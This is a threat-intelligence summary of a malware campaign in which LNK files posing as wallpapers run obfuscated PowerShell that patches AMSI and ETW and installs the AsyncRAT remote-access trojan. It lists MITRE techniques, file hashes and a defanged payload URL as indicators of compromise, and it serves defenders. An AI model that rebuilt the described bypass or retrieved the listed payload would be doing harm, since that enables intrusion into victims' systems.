FOCUS MODE
EXTRACT IOC
Threat Research

Ghost in the Shell: Null-AMSI Evading Traditional Security to Deploy AsyncRAT

Cyble
Ghost in the Shell: Null-AMSI Evading Traditional Security to Deploy AsyncRAT
A recently identified campaign utilizes malicious LNK files disguised as wallpapers to deceive users into executing malware. The attack leverages obfuscated PowerShell scripts and employs advanced techniques like Null-AMSI to bypass security measures. The final payload, AsyncRAT, allows attackers to gain remote control over victim systems. Affected: users, systems, security tools

Keypoints :

  • Campaign uses malicious LNK files disguised as popular animated character wallpapers.
  • Threat actor (TA) likely Portuguese-speaking, as indicated by comments in scripts.
  • Malware employs advanced techniques such as AMSI and ETW bypass using Null-AMSI.
  • Multi-stage execution process with PowerShell scripts fetching additional payloads.
  • AsyncRAT is the final payload, providing remote control and data theft capabilities.
  • Threat actors exploit user interests to increase infection likelihood.
  • Obfuscated and encrypted scripts complicate detection and analysis for security tools.
  • Recommendations include caution against downloading unverified files and monitoring network traffic.

MITRE Techniques :

  • User Execution: Malicious File (T1204.002) – LNK file executed by the user.
  • Command and Scripting Interpreter: PowerShell (T1059.001) – PowerShell scripts used for AMSI/ETW bypass and payload execution.
  • Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001) – output.bat added to the Windows Startup folder.
  • Native API (T1106) – VirtualProtect, GetProcAddress, and GetModuleHandle used for AMSI/ETW patching.
  • Obfuscated Files or Information (T1027) – AES-encrypted and Base64-encoded payloads used.
  • Impair Defenses: Disable or Modify Tools (T1562.001) – AMSI and ETW bypass implemented.
  • Deobfuscate/Decode Files or Information (T1140) – AES and Base64 payloads decrypted/decoded at runtime.
  • Application Layer Protocol: Web Protocols (T1071.001) – Downloads PowerShell scripts and batch files from external sources.

Indicator of Compromise :

  • SHA-256 sasuke wallpaper.lnk 5abf73e0b8d2298167801995077fa414d2e2be2051aff75ad13bfd34d3ed6590
  • SHA-256 wallpaper image.lnk f76e582e0b43caad6db6665a17341d94c709ca09dd3e36fc3e588e4566d81502
  • SHA-256 8KuV.ps1.txt 04fc833b59af93308029d3e87c85e327a1e480508bc78b6a4e46c0cbd65ea8dc
  • SHA-256 8ZOv.txt 26e91d3218cbd4f45da9f293f9647a1dfbf9d3d03aad5bd9ce85423d6e75450c
  • URL 2nd stage payload hxxps://0x0.st/8KuV.ps1

Full Story: https://cyble.com/blog/null-amsi-evading-security-to-deploy-asyncrat/

Views: 44

Tags: TROJAN, WINDOWS, BROWSER, EDR, SOCIAL ENGINEERING, SOCIAL MEDIA, SPAM, DEFENSE EVASION